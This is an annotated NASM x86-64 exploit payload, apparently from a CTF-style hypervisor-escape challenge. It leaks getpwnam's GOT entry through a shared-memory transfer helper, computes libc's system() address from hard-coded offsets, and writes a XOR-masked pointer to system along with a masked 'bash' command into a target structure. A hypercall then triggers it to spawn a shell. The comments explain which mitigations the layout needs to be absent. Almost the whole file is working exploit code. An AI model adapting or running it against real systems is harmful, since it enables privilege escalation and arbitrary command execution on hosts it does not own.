; ---------------------------------------------------------------------------
; NASM syntax, x86-64, flat position-dependent payload: single _start entry,
; no ABI-conforming prologue/epilogue, execution ends in int3.
;
; Every external routine used here (sem_increment, sem_decrement, do_encrypt,
; hypercall, sleep) is reached through a hard-coded absolute address in the
; 0x400000-0x600000 range, and data such as the getpwnam GOT slot,
; hv_kernel_shm and hv_kernel_semid is addressed absolutely as well.  That only
; works against a target whose code, GOT and globals sit at fixed addresses;
; PIE/ASLR (code and data relocate per run) and full RELRO (GOT mapped
; read-only after relocation) are the mitigations this layout depends on being
; absent.  What the fixed-address routines actually do is inferred from their
; names and the original author's trailing comments — confirm against the
; target binary before relying on any of it.
;
; Register / stack usage within this file:
;   rax           = scratch / value being transformed
;   rbx           = XOR key holder inside xor_fix (clobbered; callee-saved in
;                   SysV, but nothing here relies on it surviving)
;   rdi, rsi, rdx = arguments for the helpers, SysV order
;   The single `push rax` in _start is never popped; the stack is not restored
;   because the payload terminates at int3 rather than returning.
; ---------------------------------------------------------------------------
[BITS 64]
section .text
global _start

_start:
        ; Step 1: pass the getpwnam GOT slot and a scratch spot in the shared
        ; memory region to the 8-byte transfer helper.  Which of the two
        ; buffers do_encrypt treats as source is not visible in this file.
        mov rdi, 0x602290 ; getpwnam_got
        mov rsi, [0x603360] ; hv_kernel_shm
        add rsi, 0x1000 ; random_place
        call read_write_8

        ; Step 2: read back the 8 bytes now at hv_kernel_shm+0x1000, strip the
        ; XOR mask, and rebase: subtracting getpwnam's offset in the target's
        ; libc (0xbf980) yields libc_base; adding system's offset (0x46640)
        ; yields system.  Both offsets are specific to that libc build.
        mov rsi, [0x603360] ; hv_kernel_shm
        add rsi, 0x1000 ; random_place
        mov rax, [rsi]
        call xor_fix
        sub rax, 0xbf980 ; libc_base
        add rax, 0x46640 ; system
        call xor_fix                    ; re-mask with the same key before it is transferred (presumably do_encrypt unmasks — confirm)

        ; Step 3: stage the masked pointer on the stack and transfer it to
        ; "things + 0x10", then transfer the masked command word to "things".
        ; 0x100000038 / 0x100000028 are named only by the original comments;
        ; their role in the target is not visible here.
        push rax
        mov rdi, rsp
        mov rsi, 0x100000038 ; things + 0x10
        call read_write_8
        lea rdi, [rel command]
        mov rsi, 0x100000028 ; things
        call read_write_8

        ; Step 4: hypercall number 88 ("call_thing") with rsi = 0 and
        ; rdx -> trigger_args.  Argument meaning belongs to the hypervisor
        ; ABI and is not visible here.
        mov rdi, 88 ; call_thing
        xor rsi, rsi
        lea rdx, [rel trigger_args]
        call hypercall

        ; Step 5: emit a marker on stdout, then trap deliberately.
        call say_hello
        int3

; ---------------------------------------------------------------------------
; read_write_8(rdi = buf_a, rsi = buf_b)
;   Brackets one do_encrypt(buf_a, buf_b, 8) call with the semaphore
;   hv_kernel_semid: sem_increment before, a 1 s sleep and sem_decrement
;   after.  rdi/rsi are saved around sem_increment with push/pop (pop order
;   reversed, so they come back intact); rdx = 8 is set right before
;   do_encrypt.  The sleep is presumably a wait for a hypervisor-side worker
;   to act on the shared memory — NOTE(review): confirm.
;   Clobbers: rax, rdx, plus whatever the fixed-address callees clobber
;   (not visible here).  rdi/rsi are left as the callees leave them.
; ---------------------------------------------------------------------------
read_write_8:
        push rdi
        push rsi
        mov rdi, [0x60338C] ; hv_kernel_semid
        xor esi, esi                    ; second argument = 0 (32-bit write zero-extends rsi)
        call sem_increment
        pop rsi
        pop rdi
        mov rdx, 8                      ; transfer length
        call do_encrypt
        mov rdi, 1
        call sleep                      ; 1 second
        mov rdi, [0x60338C] ; hv_kernel_semid
        xor esi, esi
        call sem_decrement
        ret

; ---------------------------------------------------------------------------
; Tail-call trampolines into fixed addresses in the target binary.  Only eax
; is written, which zero-extends into rax, so the 32-bit immediates are the
; complete 64-bit targets.  jmp (not call) means the target's own ret returns
; directly to whoever called the trampoline.  The labels are the original
; author's names for those addresses; behaviour is not visible here.
; ---------------------------------------------------------------------------
sem_decrement:
        mov eax, 0x4015D0
        jmp rax
sem_increment:
        mov eax, 0x401600
        jmp rax
do_encrypt:
        mov eax, 0x402380
        jmp rax
hypercall:
        mov eax, 0x4016F0
        jmp rax
sleep:
        mov eax, 0x400D00
        jmp rax

; ---------------------------------------------------------------------------
; write(rdi = fd, rsi = buf, rdx = len) — raw Linux x86-64 syscall 1.
;   The syscall instruction clobbers rcx and r11; a failure comes back as
;   -errno in rax and is not checked by any caller here.
; ---------------------------------------------------------------------------
write:
        mov eax, 1
        syscall
        ret

; ---------------------------------------------------------------------------
; say_hello(): write(1, hello, 6) — prints "hello\n" to stdout as a progress
;   marker.  rdx = 6 matches the length of the hello string below.
; ---------------------------------------------------------------------------
say_hello:
        mov rdi, 1
        lea rsi, [rel hello]
        mov rdx, 6
        call write
        ret

; ---------------------------------------------------------------------------
; xor_fix(): rax ^= KEY, KEY = 0x7473656c72616863 (the ASCII bytes "charlest"
;   read little-endian).  XOR is its own inverse, so one routine both masks
;   and unmasks.  Clobbers rbx.
; ---------------------------------------------------------------------------
xor_fix:
        mov rbx, 0x7473656c72616863
        xor rax, rbx
        ret

; Constants, kept in .text (read-only use only; a flat payload has no separate
; .rodata).
hello: db 'hello',0xa                   ; 6 bytes, length hard-coded in say_hello
command: dq 0x7473656c1a120901 ; xored bash   (XOR with xor_fix's key gives "bash" followed by four NUL bytes)
trigger_args: dw 0x6162 ; ba             (two bytes 'b','a'; consumed by the hypercall — meaning not visible here)